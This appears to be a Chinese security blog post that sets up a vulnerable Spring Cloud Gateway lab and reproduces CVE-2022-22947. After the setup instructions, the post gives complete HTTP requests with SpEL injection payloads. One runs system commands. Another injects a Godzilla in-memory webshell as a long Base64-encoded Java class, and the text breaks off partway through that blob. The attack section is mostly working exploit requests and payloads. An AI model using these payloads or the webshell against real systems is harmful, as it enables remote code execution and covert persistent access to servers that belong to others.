免责声明:文章仅用于技术分享,切勿非法测试,由于传播、利用本公众号朱厌安全团队所提供的信息而造成的后果以及损失,均由使用者本人承担,本公众号朱厌安全团队以及作者不为此承担任何责任!如有侵权烦请告知,我们会立即删除并致歉!
0X01 环境搭建(从零到一)
Java环境:JDK 8
物理机环境:Windows 11
Maven版本:3.9.8
IDEA版本:最新版本
熟悉Java的师傅可以直接skip到下面漏洞原理以及复现
Idea打开,新建SpringBoot项目
选择SpringBoot->配置aliyun服务url:https://start.aliyun.com/ ->选择Java语言->Tpye: Maven -> 选择JDK8(两个都选) -> Next
选择SpringBoot 2.4.2
搜索Gateway,勾选Gateway,这里注意一下坑点,选择springboot点击后Springboot上面的版本会变回2.6,注意要改回来,然后点击 创建
这里给没有Java基础的友友理解一下,Demo7Application 是主文件,是程序入口(main方法在这里)
pom.xml 文件是想要下载依赖的配置文件(要下载什么依赖,就在这里添加,后面Maven会去自动下载)
将pom.xml文件内容替换为一下代码
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.5.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>org.example</groupId>
<artifactId>cve-2022-22947</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>cve-2022-22947</name>
<description>cve-2022-22947</description>
<properties>
<java.version>1.8</java.version>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
<spring-boot.version>2.4.2</spring-boot.version>
<spring-cloud.version>2020.0.6</spring-cloud.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-gateway</artifactId>
<version>3.1.0</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
</dependencies>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-dependencies</artifactId>
<version>2020.0.3</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<finalName>gateway</finalName>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-compiler-plugin</artifactId>
<configuration>
<source>1.8</source>
<target>1.8</target>
</configuration>
</plugin>
</plugins>
</build>
</project>
pom.xml文件实际添加了
添加了SpringBoot版本
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.5.2</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>添加了两个有漏洞的依赖
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-gateway</artifactId>
<version>3.1.0</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>将Maven配置为Maven下载的路径
打开Maven下载路径 (因为配置Maven路径前这里需要将settings文件修改一下)
将之前的settings.xml内容替换为(这里我直接替换文件了,1.xml是原来的settings.xml文件)
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
-->
<!--
| This is the configuration file for Maven. It can be specified at two levels:
|
| 1. User Level. This settings.xml file provides configuration for a single user,
| and is normally provided in ${user.home}/.m2/settings.xml.
|
| NOTE: This location can be overridden with the CLI option:
|
| -s /path/to/user/settings.xml
|
| 2. Global Level. This settings.xml file provides configuration for all Maven
| users on a machine (assuming they're all using the same Maven
| installation). It's normally provided in
| ${maven.conf}/settings.xml.
|
| NOTE: This location can be overridden with the CLI option:
|
| -gs /path/to/global/settings.xml
|
| The sections in this sample file are intended to give you a running start at
| getting the most out of your Maven installation. Where appropriate, the default
| values (values used when the setting is not specified) are provided.
|
|-->
<settings xmlns="http://maven.apache.org/SETTINGS/1.2.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.2.0 https://maven.apache.org/xsd/settings-1.2.0.xsd">
<!-- localRepository
| The path to the local repository maven will use to store artifacts.
|
| Default: ${user.home}/.m2/repository
<localRepository>D:mavennnapache-maven-3.9.8repository</localRepository>
-->
<localRepository>F:ITJAVAapache-maven-3.9.8repository</localRepository>
<!-- interactiveMode
| This will determine whether maven prompts you when it needs input. If set to false,
| maven will use a sensible default value, perhaps based on some other setting, for
| the parameter in question.
|
| Default: true
<interactiveMode>true</interactiveMode>
-->
<!-- offline
| Determines whether maven should attempt to connect to the network when executing a build.
| This will have an effect on artifact downloads, artifact deployment, and others.
|
| Default: false
<offline>false</offline>
-->
<!-- pluginGroups
| This is a list of additional group identifiers that will be searched when resolving plugins by their prefix, i.e.
| when invoking a command line like "mvn prefix:goal". Maven will automatically add the group identifiers
| "org.apache.maven.plugins" and "org.codehaus.mojo" if these are not already contained in the list.
|-->
<pluginGroups>
<!-- pluginGroup
| Specifies a further group identifier to use for plugin lookup.
<pluginGroup>com.your.plugins</pluginGroup>
-->
</pluginGroups>
<!-- TODO Since when can proxies be selected as depicted? -->
<!-- proxies
| This is a list of proxies which can be used on this machine to connect to the network.
| Unless otherwise specified (by system property or command-line switch), the first proxy
| specification in this list marked as active will be used.
|-->
<proxies>
<!-- proxy
| Specification for one proxy, to be used in connecting to the network.
|
<proxy>
<id>optional</id>
<active>true</active>
<protocol>http</protocol>
<username>proxyuser</username>
<password>proxypass</password>
<host>proxy.host.net</host>
<port>80</port>
<nonProxyHosts>local.net|some.host.com</nonProxyHosts>
</proxy>
-->
</proxies>
<!-- servers
| This is a list of authentication profiles, keyed by the server-id used within the system.
| Authentication profiles can be used whenever maven must make a connection to a remote server.
|-->
<servers>
<!-- server
| Specifies the authentication information to use when connecting to a particular server, identified by
| a unique name within the system (referred to by the 'id' attribute below).
|
| NOTE: You should either specify username/password OR privateKey/passphrase, since these pairings are
| used together.
|
<server>
<id>deploymentRepo</id>
<username>repouser</username>
<password>repopwd</password>
</server>
-->
<!-- Another sample, using keys to authenticate.
<server>
<id>siteServer</id>
<privateKey>/path/to/private/key</privateKey>
<passphrase>optional; leave empty if not used.</passphrase>
</server>
-->
</servers>
<!-- mirrors
| This is a list of mirrors to be used in downloading artifacts from remote repositories.
|
| It works like this: a POM may declare a repository to use in resolving certain artifacts.
| However, this repository may have problems with heavy traffic at times, so people have mirrored
| it to several places.
|
| That repository definition will have a unique id, so we can create a mirror reference for that
| repository, to be used as an alternate download site. The mirror site will be the preferred
| server for that repository.
|-->
<mirrors>
<!-- mirror
| Specifies a repository mirror site to use instead of a given repository. The repository that
| this mirror serves has an ID that matches the mirrorOf element of this mirror. IDs are used
| for inheritance and direct lookup purposes, and must be unique across the set of mirrors.
|
-->
<mirror>
<id>alimaven</id>
<mirrorOf>central</mirrorOf>
<name>aliyun maven</name>
<url>http://maven.aliyun.com/nexus/content/repositories/central/</url>
</mirror>
<mirror>
<id>maven-default-http-blocker</id>
<mirrorOf>external:http:*</mirrorOf>
<name>Pseudo repository to mirror external repositories initially using HTTP.</name>
<url>http://0.0.0.0/</url>
<blocked>true</blocked>
</mirror>
</mirrors>
<!-- profiles
| This is a list of profiles which can be activated in a variety of ways, and which can modify
| the build process. Profiles provided in the settings.xml are intended to provide local machine-
| specific paths and repository locations which allow the build to work in the local environment.
|
| For example, if you have an integration testing plugin - like cactus - that needs to know where
| your Tomcat instance is installed, you can provide a variable here such that the variable is
| dereferenced during the build process to configure the cactus plugin.
|
| As noted above, profiles can be activated in a variety of ways. One way - the activeProfiles
| section of this document (settings.xml) - will be discussed later. Another way essentially
| relies on the detection of a property, either matching a particular value for the property,
| or merely testing its existence. Profiles can also be activated by JDK version prefix, where a
| value of '1.4' might activate a profile when the build is executed on a JDK version of '1.4.2_07'.
| Finally, the list of active profiles can be specified directly from the command line.
|
| NOTE: For profiles defined in the settings.xml, you are restricted to specifying only artifact
| repositories, plugin repositories, and free-form properties to be used as configuration
| variables for plugins in the POM.
|
|-->
<profiles>
<!-- profile
| Specifies a set of introductions to the build process, to be activated using one or more of the
| mechanisms described above. For inheritance purposes, and to activate profiles via <activatedProfiles/>
| or the command line, profiles have to have an ID that is unique.
|
| An encouraged best practice for profile identification is to use a consistent naming convention
| for profiles, such as 'env-dev', 'env-test', 'env-production', 'user-jdcasey', 'user-brett', etc.
| This will make it more intuitive to understand what the set of introduced profiles is attempting
| to accomplish, particularly when you only have a list of profile id's for debug.
|
| This profile example uses the JDK version to trigger activation, and provides a JDK-specific repo.
-->
<profile>
<id>jdk-1.8</id>
<activation>
<activeByDefault>true</activeByDefault>
<jdk>1.8</jdk>
</activation>
<properties>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.target>1.8</maven.compiler.target>
<maven.compiler.compilerVersion>1.8</maven.compiler.compilerVersion>
</properties>
</profile>
<profile>
<id>jdk-1.4</id>
<activation>
<jdk>1.4</jdk>
</activation>
<repositories>
<repository>
<id>spring</id>
<url>https://maven.aliyun.com/repository/spring</url>
<releases>
<enabled>true</enabled>
</releases>
<snapshots>
<enabled>true</enabled>
</snapshots>
</repository>
</repositories>
</profile>
<!--
| Here is another profile, activated by the property 'target-env' with a value of 'dev', which
| provides a specific path to the Tomcat instance. To use this, your plugin configuration might
| hypothetically look like:
|
| ...
| <plugin>
| <groupId>org.myco.myplugins</groupId>
| <artifactId>myplugin</artifactId>
|
| <configuration>
| <tomcatLocation>${tomcatPath}</tomcatLocation>
| </configuration>
| </plugin>
| ...
|
| NOTE: If you just wanted to inject this configuration whenever someone set 'target-env' to
| anything, you could just leave off the <value/> inside the activation-property.
|
<profile>
<id>env-dev</id>
<activation>
<property>
<name>target-env</name>
<value>dev</value>
</property>
</activation>
<properties>
<tomcatPath>/path/to/tomcat/instance</tomcatPath>
</properties>
</profile>
-->
</profiles>
<!-- activeProfiles
| List of profiles that are active for all builds.
|
<activeProfiles>
<activeProfile>alwaysActiveProfile</activeProfile>
<activeProfile>anotherAlwaysActiveProfile</activeProfile>
</activeProfiles>
-->
</settings>
这里替换为自己的Maven路径(repository文件夹是自己创建的,需要手工创建一下)
repository文件夹创建在Maven的bin文件夹同级目录下
这里将文件路径加载为刚刚配置的settings文件路径
java同级目录创建resources文件夹
创建application.yml文件
添加内容为://port是项目启动时服务的端口
server:
port: 8081
management:
endpoints:
web:
exposure:
include: gateway
endpoint:
gateway:
enabled: true
spring:
cloud:
gateway:
routes:
- id: baidu
uri: 'https://www.baidu.com/'
order: 8000
predicates:
- Path=/skip/baidu
filters:
- StripPrefix=2找到主文件,启动项目
访问路径:/actuator/gateway/routes 搭建成功
0X02 漏洞复现 (命令执行)
访问url:http://127.0.0.1:8081/ (这里我用的8081端口起的服务)
使用burp抓包,放到重发器
-
构造poc1创建hacker文件:
POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 333
{
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
-
刷新路由
POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: __51uvsct__JuHMLCp1r3cB6ggB=1; __51vcke__JuHMLCp1r3cB6ggB=8bfe73d5-e527-5232-9cbe-1f2983c556d9; __51vuft__JuHMLCp1r3cB6ggB=1681223932313
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
-
GET访问创建的文件,注意数据包后两行有换行,确认数据包完整
GET /actuator/gateway/routes/hacker HTTP/1.1
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
0X03 漏洞复现 (写入内存马)
-
构造写入内存马数据包, 注意更换文件名 (打的哥斯拉马,可以更换为自己的马子)
POST /actuator/gateway/routes/hackerbyf0r HTTP/1.1
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 331
{
"predicates":[{"name": "Path",
"args":{"_genkey_0":"/gmem/**"}
}
],
"id": "wolaile",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBeAoADQC2BwC3CgACALYJABIAuAoAAgC5CQASALoKAAIAuwoAEgC8CQASAL0KAA0AvggAcgcAvwcAwAcAwQcAwgoADADDCgAOAMQHAMUIAJ8HAMYHAMcKAA8AyAsAyQDKCgASALYKAA4AywgAzAcAzQoAGwDOCADPBwDQBwDRCgDSANMKANIA1AoAHgDVBwDWCACBBwCECQDXANgKANcA2QgA2goA2wDcBwDdCgAVAN4KACoA3woA2wDgCgDbAOEIAOIKAOMA5AoAFQDlCgDjAOYHAOcKAOMA6AoAMwDpCgAzAOoKABUA6wgA7AoADADtCADuCgAMAO8IAPAIAPEKAAwA8ggA8wgA9AgA9QgA9ggA9wsAFAD4EgAAAP4KAP8BAAcBAQkBAgEDCgBHAQQKABsBBQsBBgEHCgASAQgKABIBCQkAEgEKCAELCwEMAQ0KABIBDgsBDAEPCAEQBwERCgBUALYKAA0BEgoAFQETCgANALsKAFQBFAoAEgEVCgAVARYKAP8BFwcBGAoAXQC2CABlCAEZAQAFc3RvcmUBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEABHBhc3MBABJMamF2YS9sYW5nL1N0cmluZzsBAANtZDUBAAJ4YwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAXTGNvbS9leGFtcGxlL0dNZW1TaGVsbDsBAAhkb0luamVjdAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAVcmVnaXN0ZXJIYW5kbGVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA5leGVjdXRlQ29tbWFuZAEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAANtc2cBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcGF0aAEADVN0YWNrTWFwVGFibGUHAM0HAMcBABBNZXRob2RQYXJhbWV0ZXJzAQALZGVmaW5lQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQABcwEAAW0BAAFaBwDFBwEaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAJicwEABXZhbHVlAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANjbWQBAF0oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTspTG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eTsBAAxidWZmZXJTdHJlYW0BAAJleAEABXBkYXRhAQAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTsBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA1TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9Qb3N0TWFwcGluZzsBAAQvY21kAQAMbGFtYmRhJGNtZCQwAQBHKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDspTHJlYWN0b3IvY29yZS9wdWJsaXNoZXIvTW9ubzsBAAZhcnJPdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQABZgEAAmlkAQAEZGF0YQEAKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDsBAAZyZXN1bHQBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7BwC3AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOR01lbVNoZWxsLmphdmEMAGkAagEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABlAGYMARsBHAwAaABmDAEdAR4MAGcAkgwAZwBmDAEfASABAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQBBb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8MASEBIgwBIwEkAQAVY29tL2V4YW1wbGUvR01lbVNoZWxsAQAwb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmVyL1NlcnZlcldlYkV4Y2hhbmdlAQAQamF2YS9sYW5nL1N0cmluZwwBJQEoBwEpDAEqASsMASwBLQEAAm9rAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwBLgBqAQAFZXJyb3IBABdqYXZhL25ldC9VUkxDbGFzc0xvYWRlcgEADGphdmEvbmV0L1VSTAcBLwwBMAExDAEyATMMAGkBNAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcBNQwBNgCZDAE3ATgBAANBRVMHARoMATkBOgEAH2phdmF4L2NyeXB0by9zcGVjL1NlY3JldEtleVNwZWMMATsBPAwAaQE9DAE+AT8MAUABQQEAA01ENQcBQgwBOQFDDAFEAUUMAUYBRwEAFGphdmEvbWF0aC9CaWdJbnRlZ2VyDAFIATwMAGkBSQwBHQFKDAFLAR4BABBqYXZhLnV0aWwuQmFzZTY0DAFMAU0BAApnZXRFbmNvZGVyDAFOASIBAA5lbmNvZGVUb1N0cmluZwEAFnN1bi5taXNjLkJBU0U2NEVuY29kZXIMAU8BUAEABmVuY29kZQEACmdldERlY29kZXIBAAZkZWNvZGUBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyDAFRAVIBABBCb290c3RyYXBNZXRob2RzDwYBUxABVA8HAVUQAKkMAVYBVwcBWAwBWQFaAQAnb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5BwFbDAFcAV0MAGkBXgwBXwEeBwFgDAFhAVQMAJwAnQwAiQCKDABhAGIBAAdwYXlsb2FkBwFiDAFjAVQMAIEAggwBZAFlAQAKcGFyYW1ldGVycwEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtDAFmAWcMAWgBaQwBagE8DACVAJYMAWgBSgwBawFsAQARamF2YS91dGlsL0hhc2hNYXABABAzYzZlMGI4YTljMTUyMjRhAQATamF2YXgvY3J5cHRvL0NpcGhlcgEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABXBhdGhzAQAHQnVpbGRlcgEADElubmVyQ2xhc3NlcwEAYChbTGphdmEvbGFuZy9TdHJpbmc7KUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbyRCdWlsZGVyOwEASW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvJEJ1aWxkZXIBAAVidWlsZAEARSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAD3ByaW50U3RhY2tUcmFjZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQApKFtMamF2YS9uZXQvVVJMO0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEAC2dldEluc3RhbmNlAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAhnZXRCeXRlcwEABCgpW0IBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEABGluaXQBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEAB2RvRmluYWwBAAYoW0IpW0IBABtqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3QBADEoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3Q7AQAGbGVuZ3RoAQADKClJAQAGdXBkYXRlAQAHKFtCSUkpVgEABmRpZ2VzdAEABihJW0IpVgEAFShJKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvVXBwZXJDYXNlAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQALZ2V0Rm9ybURhdGEBAB8oKUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87CgFtAW4BACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwoAEgFvAQAFYXBwbHkBADYoTGNvbS9leGFtcGxlL0dNZW1TaGVsbDspTGphdmEvdXRpbC9mdW5jdGlvbi9GdW5jdGlvbjsBABtyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm8BAAdmbGF0TWFwAQA8KExqYXZhL3V0aWwvZnVuY3Rpb24vRnVuY3Rpb247KUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87AQAjb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXMBAAJPSwEAJUxvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czsBADooTGphdmEvbGFuZy9PYmplY3Q7TG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzOylWAQAKZ2V0TWVzc2FnZQEAJm9yZy9zcHJpbmdmcmFtZXdvcmsvdXRpbC9NdWx0aVZhbHVlTWFwAQAIZ2V0Rmlyc3QBAA1qYXZhL3V0aWwvTWFwAQADZ2V0AQADcHV0AQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQALdG9CeXRlQXJyYXkBAARqdXN0AQAxKExqYXZhL2xhbmcvT2JqZWN0OylMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwcBcAwBcQF0DACoAKkBACJqYXZhL2xhbmcvaW52b2tlL0xhbWJkYU1ldGFmYWN0b3J5AQALbWV0YWZhY3RvcnkHAXYBAAZMb29rdXABAMwoTGphdmEvbGFuZy9pbnZva2UvTWV0aG9kSGFuZGxlcyRMb29rdXA7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RUeXBlO0xqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RUeXBlOylMamF2YS9sYW5nL2ludm9rZS9DYWxsU2l0ZTsHAXcBACVqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZXMkTG9va3VwAQAeamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGVzACEAEgANAAAABAAJAGEAYgABAGMAAAACAGQACQBlAGYAAAAJAGcAZgAAAAkAaABmAAAACgABAGkAagABAGsAAAAvAAEAAQAAAAUqtwABsQAAAAIAbAAAAAYAAQAAABMAbQAAAAwAAQAAAAUAbgBvAAAACQBwAHEAAgBrAAABSAAHAAYAAACQuwACWbcAA7IABLYABbIABrYABbYAB7gACLMACSq2AAoSCwa9AAxZAxINU1kEEg5TWQUSD1O2ABBOLQS2ABESEhITBL0ADFkDEhRTtgAQOgQEvQAVWQMrU7gAFrkAFwEAOgUtKga9AA1ZA7sAElm3ABhTWQQZBFNZBRkFU7YAGVcSGk2nAAtOLbYAHBIdTSywAAEAAACDAIYAGwADAGwAAAAyAAwAAAAaABwAGwA5ABwAPgAdAFAAHgBiAB8AgAAgAIMAJACGACEAhwAiAIsAIwCOACUAbQAAAFIACAA5AEoAcgBzAAMAUAAzAHQAcwAEAGIAIQB1AHYABQCDAAMAdwBmAAIAhwAHAHgAeQADAAAAkAB6AHsAAAAAAJAAfABmAAEAjgACAHcAZgACAH0AAAAOAAL3AIYHAH78AAcHAH8AgAAAAAkCAHoAAAB8AAAACgCBAIIAAwBrAAAAngAGAAMAAABUuwAeWQO9AB+4ACC2ACG3ACJMEiMSJAa9AAxZAxIlU1kEsgAmU1kFsgAmU7YAEE0sBLYAESwrBr0ADVkDKlNZBAO4ACdTWQUqvrgAJ1O2ABnAAAywAAAAAgBsAAAAEgAEAAAAKgASACsALwAsADQALQBtAAAAIAADAAAAVACDAIQAAAASAEIAhQCGAAEALwAlAIcAcwACAIgAAAAEAAEAGwCAAAAABQEAgwAAAAEAiQCKAAIAawAAANcABgAEAAAAKxIouAApTi0cmQAHBKcABAW7ACpZsgAGtgArEii3ACy2AC0tK7YALrBOAbAA